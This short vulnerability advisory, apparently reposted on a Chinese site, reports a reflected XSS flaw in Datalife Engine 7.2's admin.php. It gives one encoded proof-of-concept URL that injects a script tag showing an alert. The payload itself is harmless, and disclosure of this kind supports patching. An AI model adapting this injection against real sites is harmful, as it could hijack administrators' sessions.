DLE7.2 版Xss跨站漏洞被发现(Exploit)

Author : Hadi Kiamarsi
——————————————-
Discovered by : Hadi Kiamarsi
——————————————-
Exploited By : Hadi Kiamarsi
——————————————-
E-Mail : hadikiamarsi[at]hotmail.com
——————————————-
CMS: Datalife Engine ( version 7.2 )
——————————————-

XSS

Exploit :

query :

http://[www.example.com]/admin.php/%3E%22%3E%3CScRiPt%3Ealert(‘Hadi-Kiam
arsi’)%3C/ScRiPt%3E

留下评论